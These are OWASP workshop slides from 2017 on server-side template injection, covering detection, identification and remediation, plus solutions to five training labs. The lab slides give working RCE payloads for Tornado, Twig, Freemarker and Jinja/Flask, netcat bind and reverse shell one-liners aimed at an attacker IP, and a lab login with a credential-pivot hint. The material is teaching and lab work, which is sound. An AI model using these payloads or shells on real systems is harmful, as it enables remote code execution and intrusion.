Server Side Template Injection Gérôme Dieu Owasp Workshop February 2017 2017-02-22 Gérôme Dieu - owasp 2017 Workshop 1

What is a template engine ? • Modern web applications support template engines • Help developers to separate program-logic and presentation into two distinct parts • Offer rich functionalities through wikis, blogs, CMS… • Uses: • Display information about users, products, companies.. • Display gallery of photos, videos.. • Send bulk emails https://en.wikipedia.org/wiki/Web_template_system 2017-02-22 Gérôme Dieu - owasp 2017 Workshop 2

Example: jinja/flask 2017-02-22 Gérôme Dieu - owasp 2017 Workshop 3

What is a template injection ? • Some applications embed invalided user input into the template engine • Can inject in template context • Often XSS attack occurs but the SSTI can be missed • Can lead to a remote code execution (RCE) • Developer error or intentional exposure 2017-02-22 Gérôme Dieu - owasp 2017 Workshop 4

Common Template Engines • PHP – Smarty, Twigs • JAVA - Velocity, Freemaker • Python – JINJA, Mako, Tornado • JavaScript - Jade, Rage • Ruby - Liquid 2017-02-22 Gérôme Dieu - owasp 2017 Workshop 5

Methodology (based on James Kettle’s research) http://blog.portswigger.net/2015/08/server-side-template-injection.html#Methodology 2017-02-22 Gérôme Dieu - owasp 2017 Workshop 6

Detect • Plaintext: can directly input HTML • Hello {2*2} • Expected result: Hello 4 • Code: within a template expression (variable name) • Variable=username}} (break out the template statement) • Expected result: • Tips: • Trying a basic XSS • Trying a math expression {{2*2}} • Classic syntax : {exp}, {{exp}}, ${exp}, <%exp%>.. 2017-02-22 Gérôme Dieu - owasp 2017 Workshop 7

Identify http://blog.portswigger.net/2015/08/server-side-template-injection.html#Methodology 2017-02-22 Gérôme Dieu - owasp 2017 Workshop 8

Exploit • Read the documentation: really important step • Security consideration, configuration env, extensions/plugins, built-in methods, filters… • Explore: What we have access to within the template exection env • Expose self object, brute force variable names • Attack: trying to exploit it • Some classes can be used to trigger object creation, read/write files, privilege escalation… 2017-02-22 Gérôme Dieu - owasp 2017 Workshop 9

Remediation • Use a trivial template engine such as Mustache or simple Python’s template • Complementary approach: use a sandbox within a safe environment (hardening and isolate the OS) 2017-02-22 Gérôme Dieu - owasp 2017 Workshop 10

Demo 2017-02-22 Gérôme Dieu - owasp 2017 Workshop 11

Reference • James Kettle - portswigger • http://blog.portswigger.net/2015/08/server-side-template-injection.html • Wikipedia • https://en.wikipedia.org/wiki/Template_engine • https://en.wikipedia.org/wiki/Comparison_of_web_template_engines 2017-02-22 Gérôme Dieu - owasp 2017 Workshop 12

A reminder before starting • Bind Shell • Open a port on the victim server • nc –l –p 4444 –e /bin/sh • Reverse Shell • Open a port back to the attacker machine • nc IP_attacker 4444 –e /bin/sh • Reference • https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells 2017-02-22 Gérôme Dieu - owasp 2017 Workshop 13

Labs • Lab1: • http://10.11.65.[198-199]:8000/?name=xxxxx • Lab2: • http://10.11.65.[198-199]:80/ • Lab3: • http://10.11.65.[198-199]:8181/ • Lab4: • http://10.11.65.[198-199]:5000/ • Lab5: • http://10.11.65.200/admin (gdieu/password) 2017-02-22 Gérôme Dieu - owasp 2017 Workshop 14

Lab 1: hints • Hints • Syntax: • http://www.tornadoweb.org/en/stable/template.html?highlight=templating# syntax-reference 2017-02-22 Gérôme Dieu - owasp 2017 Workshop 15

Lab 1: Tornado • Detection: {{2*2}} • Identification: take a look at the headers • Exploitation: • {%import os%}{{os.popen(“cmd”).read()} • reverse shell: • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip_addr port >/tmp/f • Bind shell • mkfifo foo ; nc -lk port 0foo 2017-02-22 Gérôme Dieu - owasp 2017 Workshop 16

Lab 2: hints • Hints • central object called the environment: • http://twig.sensiolabs.org/doc/2.x/api.htmlhttps://github.com/twigphp/Twig /blob/e22fb8728b395b306a06785a3ae9b12f3fbc0294/lib/Twig/Environment. php • call_user_func: • http://php.net/manual/en/function.call-user-func.php 2017-02-22 Gérôme Dieu - owasp 2017 Workshop 17

Lab 2: twig • Detection: {{2*2}} • Identification: take a look at the headers • Exploitation: • {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter(”cmd")}} 2017-02-22 Gérôme Dieu - owasp 2017 Workshop 18

Lab 3: hints • Hints • Builtin new: • http://freemarker.org/docs/ref_builtins_expert.html#ref_builtin_new • assign: • http://freemarker.org/docs/ref_directive_assign.html • Useful classes : • http://freemarker.org/docs/api/freemarker/template/utility/Execute.html 2017-02-22 Gérôme Dieu - owasp 2017 Workshop 19

Lab 3: Freemaker • Detection: ${2*2} • Identification: take a look at the headers • Exploitation: • <#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("cmd") } 2017-02-22 Gérôme Dieu - owasp 2017 Workshop 20

Lab 4: hints • Hints • __mro__ and __subclasses__ attributes • type object and class • from_pyfile method of the Config class (flask/config.py) 2017-02-22 Gérôme Dieu - owasp 2017 Workshop 21

Lab 4: jinja/flask • Detection: ${2*2} • Identification: take a look at the headers • Exploitation: • 1 - ''.__class__.__mro__[2].__subclasses__()[40](“cmd”).read() • 2 - {{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/payload.cfg', 'w').write('from subprocess import check_output\n\nCMD = check_output\n') }} • 3 - {{ config.from_pyfile('/tmp/payload.cfg') }} • 4 - {{ config['CMD'](‘cmd',shell=True) }} 2017-02-22 Gérôme Dieu - owasp 2017 Workshop 22

Lab 5: Bonus • Solution: • Retrieve the db password: • https://craftcms.com/docs/templating/craft.config • Scan all TCP ports: • Service ssh port 10022 • Use the db password to auth 2017-02-22 Gérôme Dieu - owasp 2017 Workshop 23